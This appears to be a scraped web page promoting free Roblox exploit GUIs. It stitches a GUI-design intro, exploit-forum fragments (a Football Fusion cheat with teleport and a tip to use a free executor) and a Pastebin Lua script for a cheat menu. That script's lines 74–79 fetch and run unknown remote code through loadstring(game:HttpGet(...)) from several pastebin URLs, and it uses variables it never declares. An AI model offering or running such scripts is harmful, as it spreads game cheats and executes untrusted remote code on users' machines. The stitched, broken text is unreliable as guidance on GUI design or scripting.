Free Gui For Roblox

In this guide I will be showing you some good practices for graphical user interface (GUI) design, as well as how to make GUIs in Roblox. Ultimately what you should do is up to you; I might have good advice, but there will always be exceptions. Design is a flexible discipline. Feel free to mess around or do things that are “wrong”. Just remember that you want to provide a good experience.

  1. Free Script Gui
  1. RParticle The Light Weight, Open Source, GUI Particle System. Source Code Download What is rParticle? RParticle is a small module (around 80 lines of code) which was made with the sole intention of allowing developers to quickly and easily make 2D GUI particle systems. RParticle is set up in such a way that basically all of the particle “log.
  2. Free Roblox Scripts Home; Tutorials; Exploits; Discord; Home Da Hood GUI Da Hood GUI Featured post Murder Mystery 2 GUI. October 15, 2020. Follow by Email Get all latest content delivered straight to your inbox. Created By eaadhar Distributed By Blogger Themes.

Free Script Gui

Clear all

Free GUI for Football Fusion Roblox

  • Teleport to any selected position
  • Mid Air Catch
  • Tackle

Not suitable for Synapse X, we recommend using any other free executor

Roblox gui admin
Topic starter Posted : June 12, 2020 8:47 am

how do we use this?

Posted : October 17, 2020 9:35 pm
Please Login or Register to reply to this topic.
95Topics
5Online
Gui

Latest Post: Arsenal Auto Farm Our newest member: whdjxpnwRecent PostsUnread Posts

Forum Icons: Forum contains no unread posts Forum contains unread posts Mark all read

Topic Icons: Not Replied Replied Active Hot Sticky Unapproved Solved Private Closed

May 13th, 2018
Never
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
  1. local MainFrame = Instance.new('Frame')
  2. local Decoration = Instance.new('Frame')
  3. local Credits = Instance.new('TextLabel')
  4. local Wings = Instance.new('TextButton')
  5. local Mining = Instance.new('TextButton')
  6. local GrabKnifeV4 = Instance.new('TextButton')
  7. local OpenFrame = Instance.new('Frame')
  8. GameScriptGui.Parent = game.CoreGui
  9. MainFrame.Name = 'MainFrame'
  10. MainFrame.Active = true
  11. MainFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  12. MainFrame.Draggable = true
  13. MainFrame.Position = UDim2.new(0.339118838, 0, 0.0474308431, 0)
  14. MainFrame.Visible = false
  15. Tittle.Parent = MainFrame
  16. Tittle.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  17. Tittle.Size = UDim2.new(0, 564, 0, 36)
  18. Decoration.Name = 'Decoration'
  19. Decoration.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
  20. Decoration.Position = UDim2.new(0, 0, 0.118421055, 0)
  21. Header.Parent = MainFrame
  22. Header.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  23. Header.Position = UDim2.new(0.0549645387, 0, 0, 0)
  24. Header.Font = Enum.Font.SciFi
  25. Header.TextColor3 = Color3.new(0.333333, 1, 1)
  26. Credits.Parent = MainFrame
  27. Credits.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  28. Credits.Position = UDim2.new(0.78014183, 0, 0.092105262, 0)
  29. Credits.Font = Enum.Font.SciFi
  30. Credits.TextColor3 = Color3.new(0.333333, 1, 1)
  31. RoExploitv60.Parent = MainFrame
  32. RoExploitv60.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  33. RoExploitv60.Position = UDim2.new(0.0283687934, 0, 0.180921048, 0)
  34. RoExploitv60.Font = Enum.Font.SciFi
  35. RoExploitv60.TextColor3 = Color3.new(0.333333, 1, 1)
  36. Wings.Parent = MainFrame
  37. Wings.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  38. Wings.Position = UDim2.new(0.553191483, 0, 0.180921048, 0)
  39. Wings.Font = Enum.Font.SciFi
  40. Wings.TextColor3 = Color3.new(0.333333, 1, 1)
  41. Goku.Parent = MainFrame
  42. Goku.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  43. Goku.Position = UDim2.new(0.0283687934, 0, 0.417763174, 0)
  44. Goku.Font = Enum.Font.SciFi
  45. Goku.TextColor3 = Color3.new(0.333333, 1, 1)
  46. Mining.Parent = MainFrame
  47. Mining.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  48. Mining.Position = UDim2.new(0.553191483, 0, 0.417763174, 0)
  49. Mining.Font = Enum.Font.SciFi
  50. Mining.TextColor3 = Color3.new(0.333333, 1, 1)
  51. KohlsAdMinv2.Parent = MainFrame
  52. KohlsAdMinv2.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  53. KohlsAdMinv2.Position = UDim2.new(0.553191483, 0, 0.674342096, 0)
  54. KohlsAdMinv2.Font = Enum.Font.SciFi
  55. KohlsAdMinv2.TextColor3 = Color3.new(0.333333, 1, 1)
  56. GrabKnifeV4.Parent = MainFrame
  57. GrabKnifeV4.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  58. GrabKnifeV4.Position = UDim2.new(0.0283687711, 0, 0.674342096, 0)
  59. GrabKnifeV4.Font = Enum.Font.SciFi
  60. GrabKnifeV4.TextColor3 = Color3.new(0.333333, 1, 1)
  61. xButton.Parent = MainFrame
  62. xButton.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
  63. xButton.Size = UDim2.new(0, 31, 0, 36)
  64. xButton.Text = 'X'
  65. xButton.TextSize = 20
  66. OpenFrame.Name = 'OpenFrame'
  67. OpenFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  68. OpenFrame.Position = UDim2.new(0, 0, 0.707509875, 0)
  69. Open.Parent = OpenFrame
  70. Open.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
  71. Open.Position = UDim2.new(0, 0, 0.075000003, 0)
  72. Open.Font = Enum.Font.SciFi
  73. Open.TextColor3 = Color3.new(0.333333, 1, 1)
  74. loadstring(game:HttpGet(('https://pastebin.com/raw/5sQWSYHU'),true))()
  75. loadstring(game:HttpGet(('https://pastebin.com/raw/FWxTkFyd'),true))()
  76. loadstring(game:HttpGet(('https://pastebin.com/raw/BgcHkbXg'),true))()
  77. loadstring(game:HttpGet(('https://pastebin.com/raw/HcTy8j7m'),true))()
  78. loadstring(game:HttpGet(('https://pastebin.com/raw/gp2USAZu'),true))()
  79. loadstring(game:HttpGet(('https://pastebin.com/raw/gnea8ah2'),true))()
  80. xButton.MouseButton1Down:connect(function()
  81. MainFrame:TweenPosition(UDim2.new(0.384,0,-1,0), 'Out', 'Elastic', 3)
  82. end)
  83. Open.MouseButton1Down:connect(function()
  84. MainFrame.Visible = true
  85. MainFrame:TweenPosition(UDim2.new(0.384,0,0.377,0), 'Out', 'Elastic', 3)
RAW Paste Data
Free gui for roblox id